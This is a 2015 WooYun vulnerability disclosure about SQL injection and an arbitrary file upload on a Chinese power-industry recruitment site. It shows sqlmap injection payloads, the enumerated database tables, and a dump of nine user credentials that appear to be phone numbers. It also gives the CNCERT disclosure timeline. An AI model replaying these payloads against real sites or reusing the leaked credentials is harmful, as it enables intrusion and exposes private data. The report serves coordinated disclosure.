电力高级人才网多个SQL注入/任意上传(getshell)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136248

漏洞标题：电力高级人才网多个SQL注入/任意上传(getshell)

漏洞作者： me1ody

提交时间：2015-08-30 08:41

修复时间：2015-10-17 08:14

公开时间：2015-10-17 08:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-30：细节已通知厂商并且等待厂商处理中
2015-09-02： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-12：细节向核心白帽子及相关领域专家公开
2015-09-22：细节向普通白帽子公开
2015-10-02：细节向实习白帽子公开
2015-10-17：细节向公众公开

简要描述：

注入 - -
扫半天后台发现没有
绝望中登陆一个账户
发现任意上传
2个旁站也是招聘

详细说明：

受影响网站

http://**.**.**.**/ 权2 pr4
http://**.**.**.**/ 权1 pr4
http://**.**.**.**/ 权2 pr4

加分站点一共15个
注入点

http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218
http://**.**.**.**/web_company.aspx?CompID=20150531211633218
http://**.**.**.**/login_jobpanduan.aspx?UserName=

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CompID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] cptdb
[*] cptdb_yj
[*] dddb
[*] dlwebdb
[*] FinanceSystemDB
[*] fyh_cptdb
[*] fyh_xsdydb
[*] hbdb
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CompID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: dlwebdb
[61 tables]
+--------------------+
| Table1             |
| bjxJobList         |
| bjxJobList2        |
| dtproperties       |
| gj_agreeaddno      |
| gj_agreement       |
| gj_areainfo        |
| gj_bbscoluminfo    |
| gj_bbsinfo         |
| gj_bbsrecinfo      |
| gj_bbstotallist    |
| gj_bbsuserlist     |
| gj_checkinfo       |
| gj_checksetup      |
| gj_compaddno       |
| gj_companyinfo     |
| gj_companyinfo_bak |
| gj_compjob         |
| gj_compjob_bak     |
| gj_complookjob     |
| gj_compproperty    |
| gj_educationinfo   |
| gj_headhunter      |
| gj_jobaddno        |
| gj_jobeducation    |
| gj_jobhistory      |
| gj_jobinfo         |
| gj_jobinfo_bak     |
| gj_jobkeyinfo      |
| gj_jobkeyinfo1     |
| gj_jobkeyinfo2     |
| gj_jobkeyinfo3     |
| gj_jobkeylist      |
| gj_jobkeyword      |
| gj_jobtxtlist      |
| gj_mybook          |
| gj_myjoblist       |
| gj_nbwebinfo       |
| gj_posaddno        |
| gj_posinfo         |
| gj_positioninfo    |
| gj_remark          |
| gj_report          |
| gj_specialinfo     |
| gj_userconnect     |
| gj_userinfo        |
| gj_userlist        |
| gj_webcol          |
| gj_webinfo         |
| myTableInfo        |
| myTableJobinfo     |
| myTableList        |
| myTableLook        |
| myTablejobedu      |
| myTablejobhistory  |
| myepjoblist        |
| pbcatcol           |
| pbcatedt           |
| pbcatfmt           |
| pbcattbl           |
| pbcatvld           |
+--------------------+
Database: dlwebdb
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| dbo.gj_jobkeyword      | 1421129 |
| dbo.gj_bbsinfo         | 144719  |
| dbo.gj_compjob         | 117943  |
| dbo.gj_remark          | 94180   |
| dbo.gj_jobhistory      | 90560   |
| dbo.gj_jobaddno        | 66778   |
| dbo.gj_userlist        | 63111   |
| dbo.gj_jobeducation    | 58931   |
| dbo.gj_jobinfo         | 56439   |
| dbo.gj_posaddno        | 51275   |
| dbo.gj_positioninfo    | 50539   |
| dbo.gj_jobkeyinfo      | 49454   |
| dbo.gj_jobtxtlist      | 30864   |
| dbo.myTableInfo        | 26888   |
| dbo.gj_complookjob     | 23236   |
| dbo.Table1             | 21656   |
| dbo.gj_report          | 17062   |
| dbo.gj_webinfo         | 13036   |
| dbo.myTableList        | 12634   |
| dbo.gj_compaddno       | 9122    |
| dbo.gj_agreement       | 8057    |
| dbo.gj_companyinfo     | 8009    |
| dbo.gj_agreeaddno      | 7674    |
| dbo.gj_checkinfo       | 4719    |
| dbo.myepjoblist        | 4090    |
| dbo.myTablejobhistory  | 2451    |
| dbo.gj_bbsuserlist     | 2358    |
| dbo.myTablejobedu      | 1870    |
| dbo.myTableJobinfo     | 1845    |
| dbo.gj_mybook          | 1702    |
| dbo.gj_bbstotallist    | 1319    |
| dbo.gj_jobkeylist      | 1117    |
| dbo.gj_bbsrecinfo      | 1013    |
| dbo.bjxJobList2        | 999     |
| dbo.gj_companyinfo_bak | 990     |
| dbo.gj_areainfo        | 824     |
| dbo.myTableLook        | 531     |
| dbo.gj_compjob_bak     | 356     |
| dbo.gj_specialinfo     | 315     |
| dbo.gj_jobinfo_bak     | 287     |
| dbo.gj_posinfo         | 187     |
| dbo.gj_myjoblist       | 183     |
| dbo.gj_compproperty    | 97      |
| dbo.gj_bbscoluminfo    | 31      |
| dbo.gj_nbwebinfo       | 27      |
| dbo.gj_userinfo        | 23      |
| dbo.gj_userconnect     | 22      |
| dbo.gj_webcol          | 12      |
| dbo.gj_educationinfo   | 10      |
| dbo.gj_checksetup      | 6       |
| dbo.gj_headhunter      | 5       |
+------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CompID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: dlwebdb
Table: gj_userlist
[9 entries]
+-------------+-------------+
| userpwd     | username    |
+-------------+-------------+
| 13608625254 | 13608625254 |
| 13728997902 | 13728997902 |
| 15919100269 | 15919100269 |
| 15920137975 | 15920137975 |
| 18066122226 | 18066122226 |
| 13450359492 | 13450359492 |
| 15086006369 | 15086006369 |
| 15821583254 | 15821583254 |
| 15979843184 | 15979843184 |
+-------------+-------------+

扫半天后台发现没有
绝望中登陆一个账户
发现任意上传
getshell

数据库可以下载可以跨磁盘 2个旁站也是招聘就不下载数据库截图了危害极大

漏洞证明：

修复方案：

建议重视
好几十万的简历

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-09-02 08:13

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续尝试协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136248

漏洞标题：电力高级人才网多个SQL注入/任意上传(getshell)

相关厂商：cncert国家互联网应急中心

漏洞作者： me1ody

提交时间：2015-08-30 08:41

修复时间：2015-10-17 08:14

公开时间：2015-10-17 08:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136248

漏洞标题：电力高级人才网多个SQL注入/任意上传(getshell)

相关厂商：cncert国家互联网应急中心

漏洞作者： me1ody

提交时间：2015-08-30 08:41

修复时间：2015-10-17 08:14

公开时间：2015-10-17 08:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0136248"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：